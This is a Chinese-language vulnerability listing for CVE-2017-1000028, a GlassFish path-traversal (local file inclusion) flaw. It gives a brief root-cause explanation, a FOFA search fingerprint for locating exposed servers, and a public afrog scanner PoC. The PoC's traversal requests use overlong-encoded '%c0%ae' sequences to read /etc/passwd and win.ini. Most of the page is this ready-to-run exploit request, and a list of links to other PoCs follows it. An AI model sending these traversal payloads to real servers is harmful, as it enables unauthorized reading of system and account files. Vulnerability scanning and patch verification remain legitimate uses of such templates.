CVE-2017-1000028: GlassFish LFI

日期: 2025-09-01 | 影响软件: GlassFish | POC: 已公开

漏洞描述

GlassFish是一款强健的商业兼容应用服务器，达到产品级质量，可免费用于开发、部署和重新分发。开发者可以免费获得源代码，还可以对代码进行更改。GlassFish漏洞成因:java语义中会把"%c0%ae"解析为"\uC0AE"，最后转义为ASCCII字符的"." fofa：fid="90r39jo6/0uRhK8ILW65Lw=="

PoC代码[已公开]

id: CVE-2017-1000028

info:
    name: GlassFish LFI
    author: sharecast
    severity: high
    verified: false
    description: |
        GlassFish是一款强健的商业兼容应用服务器，达到产品级质量，可免费用于开发、部署和重新分发。开发者可以免费获得源代码，还可以对代码进行更改。GlassFish漏洞成因:java语义中会把"%c0%ae"解析为"\uC0AE"，最后转义为ASCCII字符的"."
        fofa：fid="90r39jo6/0uRhK8ILW65Lw=="

rules:
    r0:
        request:
            method: GET
            path: /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
        expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)

    r1:
        request:
            method: POST
            path: /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
        expression: response.status == 200 && response.body.bcontains(b"bit app support") && response.body.bcontains(b"fonts") && response.body.bcontains(b"extensions")
expression: r0() || r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2017/CVE-2017-1000028.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2017-1000028: Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion POC

CVE-2017-1000029: Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion POC

GlassFish 弱口令漏洞 无POC

CVE-2017-1000486: Primetek Primefaces 5.x - Remote Code Execution POC

CVE-2017-10271: WebLogic XMLDecoder 反序列化漏洞 CVE-2017-10271 POC

GlassFish 弱口令漏洞无POC